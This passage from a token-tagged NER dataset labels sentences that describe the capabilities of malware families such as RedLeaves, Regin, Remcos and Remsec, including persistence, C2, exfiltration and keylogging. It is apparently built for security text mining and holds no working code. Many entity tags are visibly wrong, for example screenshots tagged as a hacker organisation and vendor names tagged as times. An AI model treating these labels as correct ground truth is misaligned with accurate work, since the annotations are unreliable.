"and", - "passwords." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-HackOrg", - "O", - "O" - ] - }, - { - "tokens": [ - "RedLeaves", - "is", - "launched", - "through", - "use", - "of", - "DLL", - "search", - "order", - "hijacking", - "to", - "load", - "a", - "malicious", - "dll." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "RedLeaves", - "configuration", - "file", - "is", - "encrypted", - "with", - "a", - "simple", - "XOR", - "key,", - "0x53." - ], - "ner_tags": [ - "O", - "B-SamFile", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RedLeaves", - "can", - "delete", - "specified", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "RedLeaves", - "can", - "enumerate", - "and", - "search", - "for", - "files", - "and", - "directories." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RedLeaves", - "is", - "capable", - "of", - "downloading", - "a", - "file", - "from", - "a", - "specified", - "URL." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RedLeaves", - "can", - "use", - "HTTP", - "over", - "non-standard", - "ports,", - "such", - "as", - "995,", - "for", - "C2." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RedLeaves", - "attempts", - "to", - "add", - "a", - "shortcut", - "file", - "in", - "the", - "Startup", - "folder", - "to", - "achieve", - "persistence.", - "If", - "this", - "fails,", - "it", - "attempts", - "to", - "add", - "Registry", - "Run", - "keys." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "RedLeaves", - "can", - "capture", - "screenshots." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "RedLeaves", - "attempts", - "to", - "add", - "a", - "shortcut", - "file", - "in", - "the", - "Startup", - "folder", - "to", - "achieve", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RedLeaves", - "has", - "encrypted", - "C2", - "traffic", - "with", - "RC4,", - "previously", - "using", - "keys", - "of", - "88888888", - "and", - "babybear." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "RedLeaves", - "can", - "gather", - "extended", - "system", - "information", - "including", - "the", - "hostname,", - "OS", - "version", - "number,", - "platform,", - "memory", - "information,", - "time", - "elapsed", - "since", - "system", - "startup,", - "and", - "CPU", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RedLeaves", - "can", - "obtain", - "information", - "about", - "network", - "parameters." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RedLeaves", - "can", - "enumerate", - "drives", - "and", - "Remote", - "Desktop", - "sessions." - ], - "ner_tags": [ - "B-Way", - "O", - "B-SamFile", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "RedLeaves", - "can", - "obtain", - "information", - "about", - "the", - "logged", - "on", - "user", - "both", - "locally", - "and", - "for", - "Remote", - "Desktop", - "sessions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "RedLeaves", - "can", - "communicate", - "to", - "its", - "C2", - "over", - "HTTP", - "and", - "HTTPS", - "if", - "directed." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "RedLeaves", - "can", - "receive", - "and", - "execute", - "commands", - "with", - "cmd.exe.", - "It", - "can", - "also", - "provide", - "a", - "reverse", - "shell." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Reg", - "may", - "be", - "used", - "to", - "find", - "credentials", - "in", - "the", - "Windows", - "Registry." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Reg", - "may", - "be", - "used", - "to", - "interact", - "with", - "and", - "modify", - "the", - "Windows", - "Registry", - "of", - "a", - "local", - "or", - "remote", - "system", - "at", - "the", - "command-line", - "interface." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Reg", - "may", - "be", - "used", - "to", - "gather", - "details", - "from", - "the", - "Windows", - "Registry", - "of", - "a", - "local", - "or", - "remote", - "system", - "at", - "the", - "command-line", - "interface." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RegDuke", - "can", - "use", - "Dropbox", - "as", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RegDuke", - "can", - "decrypt", - "strings", - "with", - "a", - "key", - "either", - "stored", - "in", - "the", - "Registry", - "or", - "hardcoded", - "in", - "the", - "code." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RegDuke", - "can", - "store", - "its", - "encryption", - "key", - "in", - "the", - "Registry." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RegDuke", - "can", - "download", - "files", - "from", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "RegDuke", - "can", - "create", - "seemingly", - "legitimate", - "Registry", - "key", - "to", - "store", - "its", - "encryption", - "key." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RegDuke", - "can", - "use", - "control-flow", - "flattening", - "or", - "the", - "commercially", - "available", - ".NET", - "Reactor", - "for", - "obfuscation." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "RegDuke", - "can", - "extract", - "and", - "execute", - "PowerShell", - "scripts", - "from", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RegDuke", - "can", - "hide", - "data", - "in", - "images,", - "including", - "use", - "of", - "the", - "Least", - "Significant", - "Bit", - "(LSB)." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RegDuke", - "can", - "persist", - "using", - "a", - "WMI", - "consumer", - "that", - "is", - "launched", - "every", - "time", - "a", - "process", - "named", - "WINWORD.EXE", - "is", - "started." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Regin", - "leveraged", - "several", - "compromised", - "universities", - "as", - "proxies", - "to", - "obscure", - "its", - "origin." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Regin", - "malware", - "platform", - "supports", - "many", - "standard", - "protocols,", - "including", - "SMB." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Regin", - "has", - "used", - "a", - "hidden", - "file", - "system", - "to", - "store", - "some", - "of", - "its", - "components." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Regin", - "stage", - "1", - "modules", - "for", - "64-bit", - "systems", - "have", - "been", - "found", - "to", - "be", - "signed", - "with", - "fake", - "certificates", - "masquerading", - "as", - "originating", - "from", - "Microsoft", - "Corporation", - "and", - "Broadcom", - "Corporation." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Org", - "I-Org", - "O", - "B-Org", - "O" - ] - }, - { - "tokens": [ - "Regin", - "contains", - "a", - "keylogger." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Regin", - "appears", - "to", - "have", - "functionality", - "to", - "modify", - "remote", - "Registry", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "The", - "Regin", - "malware", - "platform", - "uses", - "Extended", - "Attributes", - "to", - "store", - "encrypted", - "executables." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Regin", - "appears", - "to", - "have", - "functionality", - "to", - "sniff", - "for", - "credentials", - "passed", - "over", - "HTTP,", - "SMTP,", - "and", - "SMB." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "The", - "Regin", - "malware", - "platform", - "can", - "use", - "ICMP", - "to", - "communicate", - "between", - "infected", - "computers." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Regin", - "malware", - "platform", - "can", - "use", - "Windows", - "admin", - "shares", - "to", - "move", - "laterally." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Regin", - "malware", - "platform", - "supports", - "many", - "standard", - "protocols,", - "including", - "HTTP", - "and", - "HTTPS." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Remcos", - "can", - "capture", - "data", - "from", - "the", - "system’s", - "microphone." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remcos", - "has", - "a", - "command", - "for", - "UAC", - "bypassing." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remcos", - "steals", - "and", - "modifies", - "data", - "from", - "the", - "clipboard." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remcos", - "can", - "search", - "for", - "files", - "on", - "the", - "infected", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remcos", - "can", - "upload", - "and", - "download", - "files", - "to", - "and", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remcos", - "has", - "a", - "command", - "for", - "keylogging." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remcos", - "has", - "full", - "control", - "of", - "the", - "Registry,", - "including", - "the", - "ability", - "to", - "modify", - "it." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remcos", - "uses", - "RC4", - "and", - "base64", - "to", - "obfuscate", - "data,", - "including", - "Registry", - "entries", - "and", - "file", - "paths." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remcos", - "has", - "a", - "command", - "to", - "hide", - "itself", - "through", - "injecting", - "into", - "another", - "process." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remcos", - "uses", - "the", - "infected", - "hosts", - "as", - "SOCKS5", - "proxies", - "to", - "allow", - "for", - "tunneling", - "and", - "proxying." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remcos", - "uses", - "Python", - "scripts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remcos", - "can", - "add", - "itself", - "to", - "the", - "Registry", - "key", - "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remcos", - "takes", - "automated", - "screenshots", - "of", - "the", - "infected", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remcos", - "searches", - "for", - "Sandboxie", - "and", - "VMware", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remcos", - "can", - "access", - "a", - "system’s", - "webcam", - "and", - "take", - "pictures." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Remcos", - "can", - "launch", - "a", - "remote", - "command", - "line", - "to", - "execute", - "commands", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remexi", - "has", - "a", - "command", - "to", - "capture", - "active", - "windows", - "on", - "the", - "machine", - "and", - "retrieve", - "window", - "titles." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Remexi", - "encrypts", - "and", - "adds", - "all", - "gathered", - "browser", - "data", - "into", - "files", - "for", - "upload", - "to", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Remexi", - "collects", - "text", - "from", - "the", - "clipboard." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remexi", - "decrypts", - "the", - "configuration", - "data", - "using", - "XOR", - "with", - "25-character", - "keys." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remexi", - "obfuscates", - "its", - "configuration", - "data", - "with", - "XOR." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remexi", - "performs", - "exfiltration", - "over", - "BITSAdmin,", - "which", - "is", - "also", - "used", - "for", - "the", - "C2", - "channel." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remexi", - "searches", - "for", - "files", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remexi", - "gathers", - "and", - "exfiltrates", - "keystrokes", - "from", - "the", - "machine." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remexi", - "utilizes", - "Run", - "Registry", - "keys", - "in", - "the", - "HKLM", - "hive", - "as", - "a", - "persistence", - "mechanism." - ], - "ner_tags": [ - "B-Org", - "O", - "B-Tool", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remexi", - "utilizes", - "scheduled", - "tasks", - "as", - "a", - "persistence", - "mechanism." - ], - "ner_tags": [ - "B-OffAct", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remexi", - "takes", - "screenshots", - "of", - "windows", - "of", - "interest." - ], - "ner_tags": [ - "B-Way", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remexi", - "uses", - "AutoIt", - "and", - "VBS", - "scripts", - "throughout", - "its", - "execution", - "process." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remexi", - "uses", - "BITSAdmin", - "to", - "communicate", - "with", - "the", - "C2", - "server", - "over", - "HTTP." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Remexi", - "silently", - "executes", - "received", - "commands", - "with", - "cmd.exe." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Remexi", - "executes", - "received", - "commands", - "with", - "wmic.exe", - "(for", - "WMI", - "commands)." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remexi", - "achieves", - "persistence", - "using", - "Userinit", - "by", - "adding", - "the", - "Registry", - "key", - "<code>HKLM\\Software\\Microsoft\\Windows", - "NT\\CurrentVersion\\Winlogon\\Userinit</code>." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RemoteCMD", - "copies", - "a", - "file", - "over", - "to", - "the", - "remote", - "system", - "before", - "execution." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RemoteCMD", - "can", - "execute", - "commands", - "remotely", - "by", - "creating", - "a", - "new", - "schedule", - "task", - "on", - "the", - "remote", - "system" - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RemoteCMD", - "can", - "execute", - "commands", - "remotely", - "by", - "creating", - "a", - "new", - "service", - "on", - "the", - "remote", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RemoteUtilities", - "can", - "enumerate", - "files", - "and", - "directories", - "on", - "a", - "target", - "machine." - ], - "ner_tags": [ - "B-Org", - "O", - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RemoteUtilities", - "can", - "upload", - "and", - "download", - "files", - "to", - "and", - "from", - "a", - "target", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RemoteUtilities", - "can", - "use", - "Msiexec", - "to", - "install", - "a", - "service." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RemoteUtilities", - "can", - "take", - "screenshots", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remsec", - "is", - "capable", - "of", - "using", - "DNS", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O" - ] - }, - { - "tokens": [ - "Remsec", - "has", - "a", - "package", - "that", - "collects", - "documents", - "from", - "any", - "inserted", - "USB", - "sticks." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remsec", - "has", - "a", - "plugin", - "to", - "detect", - "active", - "drivers", - "of", - "some", - "security", - "products." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remsec", - "can", - "add", - "or", - "remove", - "applications", - "or", - "ports", - "on", - "the", - "Windows", - "firewall", - "or", - "disable", - "it", - "entirely." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "B-HackOrg", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Remsec", - "can", - "perform", - "DLL", - "injection." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "data", - "in", - "Remsec", - "is", - "encrypted", - "using", - "RC5", - "in", - "CBC", - "mode,", - "AES-CBC", - "with", - "a", - "hardcoded", - "key,", - "RC4,", - "or", - "Salsa20.", - "Some", - "data", - "is", - "also", - "base64-encoded." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remsec", - "can", - "exfiltrate", - "data", - "via", - "a", - "DNS", - "tunnel", - "or", - "email,", - "separately", - "from", - "its", - "C2", - "channel." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remsec", - "contains", - "a", - "module", - "to", - "move", - "data", - "from", - "airgapped", - "networks", - "to", - "Internet-connected", - "systems", - "by", - "using", - "a", - "removable", - "USB", - "device." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Remsec", - "has", - "a", - "plugin", - "to", - "drop", - "and", - "execute", - "vulnerable", - "Outpost", - "Sandbox", - "or", - "avast!", - "Virtualization", - "drivers", - "in", - "order", - "to", - "gain", - "kernel", - "mode", - "privileges." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "Remsec", - "is", - "capable", - "of", - "deleting", - "files", - "on", - "the", - "victim.", - "It", - "also", - "securely", - "removes", - "itself", - "after", - "collecting", - "and", - "exfiltrating", - "data." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "Remsec", - "is", - "capable", - "of", - "listing", - "contents", - "of", - "folders", - "on", - "the", - "victim.", - "Remsec", - "also", - "searches", - "for", - "custom", - "network", - "encryption", - "software", - "on", - "victims." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remsec", - "contains", - "a", - "network", - "loader", - "to", - "receive", - "executable", - "modules", - "from", - "remote", - "attackers", - "and", - "run", - "them", - "on", - "the", - "local", - "victim.", - "It", - "can", - "also", - "upload", - "and", - "download", - "files", - "over", - "HTTP", - "and", - "HTTPS." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Remsec", - "contains", - "a", - "keylogger", - "component." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Remsec", - "can", - "obtain", - "a", - "list", - "of", - "users." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Remsec", - "is", - "capable", - "of", - "using", - "SMTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Remsec", - "loader", - "implements", - "itself", - "with", - "the", - "name", - "Security", - "Support", - "Provider,", - "a", - "legitimate", - "Windows", - "function.", - "Various", - "Remsec", - ".exe", - "files", - "mimic", - "legitimate", - "file", - "names", - "used", - "by", - "Microsoft,", - "Symantec,", - "Kaspersky,", - "Hewlett-Packard,", - "and", - "VMWare.", - "Remsec", - "also", - "disguised", - "malicious", - "modules", - "using", - "similar", - "filenames", - "as", - "custom", - "network", - "encryption", - "software", - "on", - "victims." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-Time", - "B-Time", - "B-Org", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remsec", - "has", - "a", - "plugin", - "that", - "can", - "perform", - "ARP", - "scanning", - "as", - "well", - "as", - "port", - "scanning." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Remsec", - "is", - "capable", - "of", - "using", - "ICMP,", - "TCP,", - "and", - "UDP", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Remsec", - "harvests", - "plain-text", - "credentials", - "as", - "a", - "password", - "filter", - "registered", - "on", - "domain", - "controllers." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remsec", - "can", - "obtain", - "a", - "process", - "list", - "from", - "the", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - 